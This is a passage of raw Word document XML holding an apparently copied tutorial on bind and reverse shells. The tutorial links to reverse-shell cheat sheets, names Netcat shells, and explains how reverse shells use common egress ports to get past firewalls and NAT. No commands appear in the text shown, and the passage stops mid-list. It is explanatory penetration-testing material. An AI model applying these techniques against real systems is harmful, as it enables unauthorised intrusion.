            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>pentestmonkey.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C6807DE" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:tooltip="https://highon.coffee/blog/reverse-shell-cheat-sheet/" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Reverse Shell Cheat Sheet</w:t>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:br/>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Reverse Shell Cheat Sheet, a list of reverse shells for connecting back</w:t>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>highon.coffee</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06A763DE" w14:textId="4E02B0AE" w:rsidR="00835152" w:rsidRDefault="00835152"/>
    <w:p w14:paraId="5840E5AA" w14:textId="4CB79E86" w:rsidR="00835152" w:rsidRDefault="00835152"/>
    <w:p w14:paraId="605C914B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="468" w:after="0" w:line="600" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Bind Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3ECAC1" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="206" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Bind shells have the listener running on the target and the attacker connect to the listener in order to gain a remote shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F52628" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="238EA373" wp14:editId="322148B9">
            <wp:extent cx="16383000" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18"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383000" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C5906B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41EFA1CC" wp14:editId="211ED89E">
            <wp:extent cx="16383000" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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83000" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E422213" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Netcat bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A221E7F" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>There is a security issue with bind shells, though, and that is the fact that </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>anyone </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>can connect to the bind shell and run commands. A malicious actor can take advantage of this easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F8E80C" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>There is another key issue with bind shells, and that is the fact that if we were trying to connect to an internal host’s bind shell, 2 things could prevent us:</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Firewalls often have strict inbound traffic filtering</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>NAT/PAT translation process changes the private IP address (RFC 1918) into different public IP addresses, and can even change the port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEADC38" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>We can try and resolve issue 1 by setting the target’s bind shell to listen on a popular port, such as 443, but it is possible that the firewall blocks external connections from even the most popular ports. Is there a better way to gain a remote shell from a target, without having to face the security, firewall and NAT/PAT issues?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490F0B3D" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="468" w:after="0" w:line="600" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612EF428" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3768E025" wp14:editId="4D6BAE80">
            <wp:extent cx="19088100" cy="2114550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Picture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88100" cy="2114550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="615989EE" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37125425" wp14:editId="5532DBA4">
            <wp:extent cx="19088100" cy="2114550"/>
            <wp:effectExtent l="0" t="0" r="0" b="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for pos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88100" cy="2114550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D62C7" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Netcat reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739334AC" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>The answer is — yes!</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>Reverse shells have the listener running on the attacker and the target connects to the attacker with a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71589627" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse shells solve a lot of headache that bind shells caused us, let’s see how it has solved each of the 3 issues.</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse shells remove the need for a listener on the target machine, which means we don’t have to leave the target vulnerable to other malicious actors.</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reverse shells can use popular ports (e.g. 80, 443) which are usually allowed on egress connections from an internal network to </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>an external network, bypassing firewall restrictions.</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
